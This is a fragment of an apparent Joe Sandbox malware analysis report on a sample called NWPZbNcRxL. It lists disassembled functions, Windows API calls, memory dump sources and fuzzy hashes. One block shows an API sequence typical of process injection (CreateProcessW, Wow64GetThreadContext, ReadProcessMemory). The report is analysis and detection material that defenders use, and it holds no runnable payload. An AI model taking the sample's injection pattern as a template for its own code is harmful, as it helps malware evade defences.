                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00C79548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C798D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseCreateHandleTime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3397143404-0
                                                                                                                            • Opcode ID: b04d17592822e8ceb639015ba5c78fa17fbb363b0c94f404b61fed70e36f918d
                                                                                                                            • Instruction ID: c6511e26d66413eac8e88f0dc0515691432723c2121723d1aaee7c11e8d0a832
                                                                                                                            • Opcode Fuzzy Hash: b04d17592822e8ceb639015ba5c78fa17fbb363b0c94f404b61fed70e36f918d
                                                                                                                            • Instruction Fuzzy Hash: 9CE08632140214B7EB211B64EC0EFDE7B19EB06760F108125FB24A90F087B1562297D8
                                                                                                                            APIs
                                                                                                                            • _free.LIBCMT ref: 00C78D1B
                                                                                                                              • Part of subcall function 00C32D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00C39A24), ref: 00C32D69
                                                                                                                              • Part of subcall function 00C32D55: GetLastError.KERNEL32(00000000,?,00C39A24), ref: 00C32D7B
                                                                                                                            • _free.LIBCMT ref: 00C78D2C
                                                                                                                            • _free.LIBCMT ref: 00C78D3E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 776569668-0
                                                                                                                            • Opcode ID: c56cf7ee783aa8295308e84720220828ccc4d403300e1e82c1220f1652f177a4
                                                                                                                            • Instruction ID: c633dbf315a95d57c0d43ffc37f79d539e478ce928b7708461c737af82590984
                                                                                                                            • Opcode Fuzzy Hash: c56cf7ee783aa8295308e84720220828ccc4d403300e1e82c1220f1652f177a4
                                                                                                                            • Instruction Fuzzy Hash: 9CE012B165160246CF34A678AD48A9313DC4F68352B24491DB62DD7186DF64F946D124
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: CALL
                                                                                                                            • API String ID: 0-4196123274
                                                                                                                            • Opcode ID: 106c30d4c21290c277eaf453964886d9854392eddf2838e08d3152bfc969c27b
                                                                                                                            • Instruction ID: 12685adb9c783136b3a7e84846a99a60ef1b58e02ab48d23f91a37738fe2de23
                                                                                                                            • Opcode Fuzzy Hash: 106c30d4c21290c277eaf453964886d9854392eddf2838e08d3152bfc969c27b
                                                                                                                            • Instruction Fuzzy Hash: C6224974509201DFC724DF14C494BAABBE1FF86314F14896DE89A8B361D731ED85EB82
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID: EA06
                                                                                                                            • API String ID: 4104443479-3962188686
                                                                                                                            • Opcode ID: ffe41f50ca0e583bd70c3fa576de6be4348e3ce45ae3e475abdc25da81580c27
                                                                                                                            • Instruction ID: 9437a3ad685653456a2aacd7b9f928fd3cf1713ff8512d5ad18d5ee36132186c
                                                                                                                            • Opcode Fuzzy Hash: ffe41f50ca0e583bd70c3fa576de6be4348e3ce45ae3e475abdc25da81580c27
                                                                                                                            • Instruction Fuzzy Hash: B6414F71A0415857DF196B64E861BFE7FA29F47300F684475EC829B282D6309EC5B3A1
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00C15821,?,?,?,?), ref: 00C15CC7
                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00C15821,?,?,?,?), ref: 00C4DD73
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 823142352-0
                                                                                                                            • Opcode ID: d565e1e1dceb94d038a1b099acd72657fc0c0181fbc9dd5a72f31c1767279cb0
                                                                                                                            • Instruction ID: 21c49de08ede2626c8e94acfcbfd8d60fd175d2d60b491c1ca78ec4442e28888
                                                                                                                            • Opcode Fuzzy Hash: d565e1e1dceb94d038a1b099acd72657fc0c0181fbc9dd5a72f31c1767279cb0
                                                                                                                            • Instruction Fuzzy Hash: E4019670244748FEF7201E24CC9AFB637DCEB05768F208319BBE59A1E0C6B41D859B94
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C3571C: __FF_MSGBANNER.LIBCMT ref: 00C35733
                                                                                                                              • Part of subcall function 00C3571C: __NMSG_WRITE.LIBCMT ref: 00C3573A
                                                                                                                              • Part of subcall function 00C3571C: RtlAllocateHeap.NTDLL(00EE0000,00000000,00000001,00000000,?,?,?,00C30DD3,?), ref: 00C3575F
                                                                                                                            • std::exception::exception.LIBCMT ref: 00C30DEC
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00C30E01
                                                                                                                              • Part of subcall function 00C3859B: RaiseException.KERNEL32(?,?,?,00CC9E78,00000000,?,?,?,?,00C30E06,?,00CC9E78,?,00000001), ref: 00C385F0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3902256705-0
                                                                                                                            • Opcode ID: 611954518ee0d7573e844122a34ff9e81b0b14d1b6ef8847872171139d23112c
                                                                                                                            • Instruction ID: 58913e5cdad045ee2690a6c7b28b59a44554e83ceaaf1812a037b95aeee50770
                                                                                                                            • Opcode Fuzzy Hash: 611954518ee0d7573e844122a34ff9e81b0b14d1b6ef8847872171139d23112c
                                                                                                                            • Instruction Fuzzy Hash: 0EF0F47292032A66CB10BAD8EC21ADE77AC9F01310F200429F814A6982DF709A44E6D1
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __lock_file_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 26237723-0
                                                                                                                            • Opcode ID: 0d7a9cbc8529af5a511ca462bde29ac1ecb168fcd64949e4289cdbf5df857aeb
                                                                                                                            • Instruction ID: df24b1ab6c862d86185c337b63c2818fd7eff241ea75b59c61030d8e161de37a
                                                                                                                            • Opcode Fuzzy Hash: 0d7a9cbc8529af5a511ca462bde29ac1ecb168fcd64949e4289cdbf5df857aeb
                                                                                                                            • Instruction Fuzzy Hash: 5001F2B1820B09EBCF12AF689C0799E7B71AF90361F408115F8241B2A1DB318A11FF91
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C38B28: __getptd_noexit.LIBCMT ref: 00C38B28
                                                                                                                            • __lock_file.LIBCMT ref: 00C353EB
                                                                                                                              • Part of subcall function 00C36C11: __lock.LIBCMT ref: 00C36C34
                                                                                                                            • __fclose_nolock.LIBCMT ref: 00C353F6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2800547568-0
                                                                                                                            • Opcode ID: e2ec56a3f680ba84f0757a486652d14061a503e910bb40155efdb5ace79bc0ab
                                                                                                                            • Instruction ID: 3960019e39b15c06c909e5a40bec9fb2e2d3d14fb83b3d86562c25202ba2d5a9
                                                                                                                            • Opcode Fuzzy Hash: e2ec56a3f680ba84f0757a486652d14061a503e910bb40155efdb5ace79bc0ab
                                                                                                                            • Instruction Fuzzy Hash: 8CF0B471921B059ADB51BF7598067AD7BE06F41374F218208F424AB1D1CFFC8A45BB92
                                                                                                                            APIs
                                                                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 01026A3B
                                                                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01026AD1
                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01026AF3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2063845734.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_1024000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2438371351-0
                                                                                                                            • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                                                                            • Instruction ID: 1dad8f9910121dffa0d7cbf6e3e5242a96182de92e1270cde2e22bd8eb0e3f33
                                                                                                                            • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                                                                            • Instruction Fuzzy Hash: FD12DD24E24658C6EB24DF64D8507DEB272EF68300F1090E9D10DEB7A4E77A4E91CF5A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1be7317017a55cad2e0afcaa75da0c7b10232de38327c7a52f7fb8991dd03c55
                                                                                                                            • Instruction ID: d9b477fc74e0372a3e0abf1c1af632c3732008d33aa690c81c7bfe0383bb93a4
                                                                                                                            • Opcode Fuzzy Hash: 1be7317017a55cad2e0afcaa75da0c7b10232de38327c7a52f7fb8991dd03c55
                                                                                                                            • Instruction Fuzzy Hash: 9661BC7460020A9FDB14DF60C890AAAB7F5EF06304F64847DE926972A1D770EEC6EB50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 39c4ecff344b5927462c3bb153771eb1869a85449376b777af5acb8c922a1737
                                                                                                                            • Instruction ID: b35f6725c62cb214fad0a6562ae696077753ce4b5f077327aa8fbb534ba17d40
                                                                                                                            • Opcode Fuzzy Hash: 39c4ecff344b5927462c3bb153771eb1869a85449376b777af5acb8c922a1737
                                                                                                                            • Instruction Fuzzy Hash: 3251E335700614EFCF14EF68C891EAE77A6AF85310F548168F816AB392DB30EE45EB51
                                                                                                                            APIs
                                                                                                                            • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00C15B96
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FilePointer
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 973152223-0
                                                                                                                            • Opcode ID: b0d1ba1e69b32a9d7ac7b824ca46ac33cb4882038b2b67508a28950f2713cee0
                                                                                                                            • Instruction ID: d10f6b3b47b3467a45ec1b4496f100d2efe47fb3cc2c18305279d6fc97546867
                                                                                                                            • Opcode Fuzzy Hash: b0d1ba1e69b32a9d7ac7b824ca46ac33cb4882038b2b67508a28950f2713cee0
                                                                                                                            • Instruction Fuzzy Hash: 1E314C31A04A09EFCB18DF6DC484AADF7B5FF89310F148629E82993750D770B9A0DB90
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 544645111-0
                                                                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                            • Instruction ID: c9e434a9bf51fce6fca1837675821fd9ad70eb7ab6121c14a4a02ea16ed68fd2
                                                                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                            • Instruction Fuzzy Hash: D631F572A101059BC718DF49E4A4A69F7A6FB49300F3497A5E81ACB351D731EEC1DBC2
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClearVariant
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1473721057-0
                                                                                                                            • Opcode ID: a9814036973f37605d45fd544d1a95cf3c1d47254935cad72123e3d72f8201c7
                                                                                                                            • Instruction ID: dc6bedd5eeeed327161b760885b9beaee7be345db65bb8d4f4cec627542c005f
                                                                                                                            • Opcode Fuzzy Hash: a9814036973f37605d45fd544d1a95cf3c1d47254935cad72123e3d72f8201c7
                                                                                                                            • Instruction Fuzzy Hash: 134138746043519FDB14DF14C458B5ABBE1BF45318F1988ACE8998B362C332ED86DF52
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4104443479-0
                                                                                                                            • Opcode ID: 108539a7de57f08acd46eda96d21ee787eacc0ae51eb71a4de1abfa654612ccb
                                                                                                                            • Instruction ID: 4ed1e39c70626970641d41ad72785b43b155516db1b418fe0c4034b183cb4984
                                                                                                                            • Opcode Fuzzy Hash: 108539a7de57f08acd46eda96d21ee787eacc0ae51eb71a4de1abfa654612ccb
                                                                                                                            • Instruction Fuzzy Hash: A721D571A04A08EBDB14AF52E884BAE7FB8FF55351F31886AE486D5110EBB0D4D0E742
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcscmp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 856254489-0
                                                                                                                            • Opcode ID: cad3e36dace1423c500330221d645255f304b88db2b62b7d5f53dcee8285a69b
                                                                                                                            • Instruction ID: bf65dcbbc86666db949aa527529b2620a3278879ccec80038c78dae0bb22f057
                                                                                                                            • Opcode Fuzzy Hash: cad3e36dace1423c500330221d645255f304b88db2b62b7d5f53dcee8285a69b
                                                                                                                            • Instruction Fuzzy Hash: 9311A271904119EBCB14EB65DC85AEEB778EF96360F044126FC21A7190DE30AE85FB90
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C14BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00C14BEF
                                                                                                                              • Part of subcall function 00C3525B: __wfsopen.LIBCMT ref: 00C35266
                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00CD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C14E0F
                                                                                                                              • Part of subcall function 00C14B6A: FreeLibrary.KERNEL32(00000000), ref: 00C14BA4
                                                                                                                              • Part of subcall function 00C14C70: _memmove.LIBCMT ref: 00C14CBA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
